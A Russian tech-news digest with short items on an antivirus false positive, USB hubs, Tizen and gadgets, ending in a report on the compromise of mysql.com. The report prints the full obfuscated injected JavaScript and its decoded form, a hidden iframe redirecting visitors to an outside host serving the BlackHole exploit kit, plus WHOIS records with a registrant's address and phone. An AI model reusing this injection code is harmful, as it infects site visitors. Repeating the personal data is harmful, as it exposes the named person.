Очередное обновление антивирусного пакета Microsoft привело к удалению браузера Chrome

Пользователи бесплатного антивирусного пакета Microsoft Security Essentials, после сегодняшнего обновления базы сигнатур, столкнулись с неожиданным уведомлением - антивирус сообщил о наличии в системе вредоносного ПО "PWS:Win32/Zbot" и предложил удалить его. После согласия на удаление, из системы удалялся браузер Chrome. Как оказалось, антивирус из-за ложного срабатывания воспринимал Chrome как вредоносное ПО "PWS:Win32/Zbot". Компания Microsoft подтвердила наличие проблемы и выпустила корректирующее обновление.
Пока не опубликовано официального пресс-релиза и публичного извинения перед пользователями, лишившимися браузера Chrome (настройки, дополнения и прочие пользовательские данные восстанавливаются после переустановки Chrome). Маловероятно, что Microsoft пошла на подобную блокировку специально. Скорее всего, кто-то третий решил подлить масло в огонь и продемонстрировал в действии новый вектор атаки, осуществляемой силами антивирусных программ.
Например, возможно имело место создание подставного вредоносного ПО, неизменяемая часть которого подобрана так, чтобы созданная антивирусная сигнатура намеренно приводила к блокировке не только исходного вредоносного ПО, но и целевого продукта, на который направлена атака. В частности, имея базу сигнатур и набор вредоносных программ, для которых созданы данные сигнатуры, можно сопоставить информацию и определить типовые особенности создания сигнатур для определенного антивирусного продукта. Используя эти особенности можно создать вредоносный код, сигнатура для которого с большой вероятностью будет создана предсказуемым образом. С другой стороны, браузер Chrome является одной из самых популярных программ для Windows, т.е. должен входить в число продуктов, обязательно проверяемых на наличие ложных срабатываний.

Снижает ли USB-хаб скорость накопителя?

При подключении жестких дисков и флешек через USB-хаб иногда задумывался — а вдруг это промежуточное звено снижает скорость работы с накопителем? Решил наконец проверить и убедиться. Пытался собрать максимально длинную цепочку из хабов, чтобы влияние точно проявилось (если оно есть).
Для начала оказалось, что 8 хабов многовато — Windows 7 после 5 хабов выдает предупреждение о превышении цепочки и отказывается видеть диск. Так что проводим исследование с этими пятью устройствами USB 2.0: Roccat Apuri → Viewcon VE097 → Apacer PH151 → Gembird UHB-CT18 → SVEN HB-012. На диск, разумеется, подавалось дополнительное питание.
Сильнее всего упала скорость линейного чтения (7%), замедлилась запись (3%), скорость чтения мелкими блоками снизилась на 3% и еще на столько же выросла скорость их записи, что странно (погрешность измерений?). В целом не так уж и плохо.

Для сравнения результаты с одним USB-хабом, Roccat Apuri. Падения незначительны, чтение крупными блоками так вообще выросло — похоже у CrystalDiskMark не всё хорошо с повторяемостью результатов и погрешностью измерений.

Мораль: смело подключайте накопитель через хаб и не переживайте о влиянии на скорость :)

Сенсорный столик iTableous в виде гигантского iPhone

Это сенсация! Новый iPhone оказался не смартфоном, а журнальным столиком. Нет, гигантским столом с гигантским дисплеем. Это, конечно, шутка, но в каком-то смысле гигантский iPhone действительно существует, пусть даже телефоном его назвать трудно. Новая установка получила название iTableous, она выполнена в виде журнального столика по образу и подобию виде iPhone 4, только в масштабе 1:10.

Автором проекта стал дизайнер Бенджамин Бахмайер (Benjamin Bachmeier), здесь есть все, что есть у оргиннала: кнопка выключения питания, кнопки регулировки громкости, кнопка HOME, а также 40-дюймовый дисплей. Здесь использован экран Toyota с разрешением 1920x1080 точек, и, как ни странно, он лишен сенсорной панели, поэтому управление осуществляется с реального iPhone 4.

Настоящий смартфон подключается по стандартному 30-контактному интерфейсу, коннектор скрывается под имитацией кнопки HOME. Кстати, можно подключить вообще любое устройство с этим интерфейсом, в том числе iPad или iPod touch. Кстати, для обработки данных на этом дисплее используется полномасштабный компьютер с винчестером на 500 Гб и 4 Гб оперативной памяти, на этом компьютере установлены Windows 7 и Mac OS X 10.6.7.

Новое имя среди мобильных платформ: Tizen

Сегодня было объявлено об объединении двух известных но не добившихся популярности мобильных linux-based платформ: LiMo и MeeGo

Новый проект будет называться Tizen. Платформа будет находится под крылом Linux Foundation, как всегда сообщается, что платформа будет полностью открытой… но мы то знаем…

На данный момент известно, что основной платформой для разработки приложений будет HTML5. Однако будет предоставлен NDK для native девелоперов, что оставляет надежду на поддержку Qt Framework в этой новой системе.

Также известно что Intel AppUp будет принимать приложения для новой платформы.

Чтож, король умер — да здравствует король!
Будем наблюдать, что из этого получится.

Совмещение реальностей

Компания Disney представила игрушечные машинки Appmates, сделанные по мотивам мультфильма «Тачки». И это не простые игрушки, а оригинальные аксессуары к твоему Apple iPad. Специально под них программисты Disney написали игру, в которой эти машинки являются героями повествования. Любую из Disney Appmates можно положить на экран гаджета с запущенным приложением и начать играть, совмещая ощущения реального мира и виртуального.
Работает это просто: каждый автомобильчик имеет уникальный цифровой отпечаток, который распознается игрой с помощью сенсорного экрана планшета. Узнав, что за сказочный герой опустился на игровое поле, приложение автоматически выстраивает вокруг него нужную сюжетную линию.
На данный момент в Disney Appmates обещаны: Lightning McQueen, Tow Mater, Finn McMissile и Holley Shiftwell. Они появятся в продаже с 1 октября по цене $20 за пару. Тогда же в AppStore появятся и обещанные интерактивные гонки. А уже в ноябре к машинкам прибудет серьезное подкрепление в лице еще двух королей автогонок: Francesco Bernoulli и Shu Todoroki.

Интернет фанатики

Блог Oddee.com собрал фото настоящих фанатов Интернета и технологий, которые признались в любви к онлайн-сервисам и телефонам, набив татуировки на своем теле.











источник

MySQL.com взломан и продан за 3000$

Скриншот вредоносного кода на странице:


Видео, демонстрирующее как пользователи заражаются:

Шаг 1:

Посещаем сайт mysql.com

Шаг 2:

Загружаем вредоносный скрипт: mysql.com/common/js/s_code_remote.js?ver=20091011

/* SiteCatalyst code version: H.14. Copyright Omniture, Inc. More info available at http://www.omniture.com */
/* Author: Neil Evans */
/************************** CONFIG SECTION ****************************************/
/* Specify the Report Suite(s) */
Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,82/n,246/n,18/n,18/n,18/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,118/n,18/n,18/n,250/n,64/n,202/n,216/n,230/n,202/n,64/n,246/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,238/n,228/n,210/n,232/n,202/n,80/n,68/n,120/n,210/n,204/n,228/n,194/n,218/n,202/n,64/n,230/n,228/n,198/n,122/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,64/n,238/n,210/n,200/n,232/n,208/n,122/n,78/n,98/n,96/n,78/n,64/n,208/n,202/n,210/n,206/n,208/n,232/n,122/n,78/n,98/n,96/n,78/n,64/n,230/n,232/n,242/n,216/n,202/n,122/n,78/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,116/n,208/n,210/n,200/n,200/n,202/n,220/n,118/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,116/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,118/n,216/n,202/n,204/n,232/n,116/n,96/n,118/n,232/n,222/n,224/n,116/n,96/n,118/n,78/n,124/n,120/n,94/n,210/n,204/n,228/n,194/n,218/n,202/n,124/n,68/n,82/n,118/n,18/n,18/n,250/n,18/n,18/n,204/n,234/n,220/n,198/n,232/n,210/n,222/n,220/n,64/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,246/n,18/n,18/n,18/n,236/n,194/n,228/n,64/n,204/n,64/n,122/n,64/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,198/n,228/n,202/n,194/n,232/n,202/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,80/n,78/n,210/n,204/n,228/n,194/n,218/n,202/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,230/n,228/n,198/n,78/n,88/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,82/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,122/n,78/n,208/n,210/n,200/n,200/n,202/n,220/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,122/n,78/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,216/n,202/n,204/n,232/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,232/n,222/n,224/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,238/n,210/n,200/n,232/n,208/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,208/n,202/n,210/n,206/n,208/n,232/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,92/n,194/n,224/n,224/n,202/n,220/n,200/n,134/n,208/n,210/n,216/n,200/n,80/n,204/n,82/n,118/n,18/n,18/n,250/n];mm={}.qwe();for(i=0;iif({}.asd==='e')s+=mm(e("m"+"["+"i]"));e(s);

var s_account="sunmysqldev";
var sun_dynamicAccountSelection=true;
var sun_dynamicAccountList="sunglobal,sunmysql=mysql.com;sunglobal,sunmysql=mysql.de;sunglobal,sunmysql=mysql.fr;sunglobal,sunmysql=mysql.it;sunmysqldev=.";
/* Specify the Site ID */
var s_siteid="mysql:";
/* PageName Settings */
if (typeof s_pageType=='undefined') {
	var s_pageName=window.location.host+window.location.pathname;
	s_pageName=s_pageName.replace(/www.mysql.com/,"");
	s_pageName=s_pageName.replace(/www.mysql./,"");
	s_pageName=s_pageName.replace(/.mysql.com/,":");
	s_pageName=s_pageName.replace(/mysql.com/,"");
}
/* Remote Omniture JS call  */
var sun_ssl=(window.location.protocol.toLowerCase().indexOf("https")!=-1);
	if(sun_ssl == true) { var fullURL = "https://www.sun.com/share/metrics/metrics_group1.js"; }
		else { var fullURL= "http://www-cdn.sun.com/share/metrics/metrics_group1.js"; }
document.write(" + "ript type=\"text/javascript\" src=\""+fullURL+"\"> + "ript>");
/************************** END CONFIG SECTION **************************************/
/* Split dev.mysql.com Path  */
var mysql_host=location.hostname;
if (mysql_host=='dev.mysql.com') {
	var mysql_url=window.location.pathname.toLowerCase();
	var mysql_split=mysql_url.split("/");
}
/* Reset PageName Settings  */
function s_postPlugins(s) {
/* dev.mysql.com/doc ---> prop31  */
if (mysql_host=='dev.mysql.com') {
	if (mysql_split[1]=="doc") {
		s.prop31=s.pageName;
		s.pageName=s.channel+" (site section)";
		}
	}
/* lists.mysql.com ---> prop31  */
	if (mysql_host=='lists.mysql.com') {
		s.prop31=s.pageName;
		s.pageName=s.channel+" (site section)";
	}
}

Декодированный скрипт выглядит следующим образом:


Ну и текстом:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://falosfax.in/info/in.cgi?5');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);

Скрипт генерирует ифрейм и редиректит нас на falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/, а отсюда на truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

Здесь присутствует вредоносная связка BlackHole. Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.), и после успешной эксплуатации устанавливает вредоносную программу на ОС без ведома пользователя. Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.

В настоящее время 4 из 44 антивирусов на VirusTotal могут обнаружить эту вредоносную программу:


Данные доменов:
falosfax.inAddress: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc
Address: 46.16.233.108
Location: Sweden / Stockholm

Brian Krebs в своем блоге отметил, что недавно видел как на русском хакерском форуме продавали полный доступ к домену mysql.com и ко всем поддоменам за 3000$.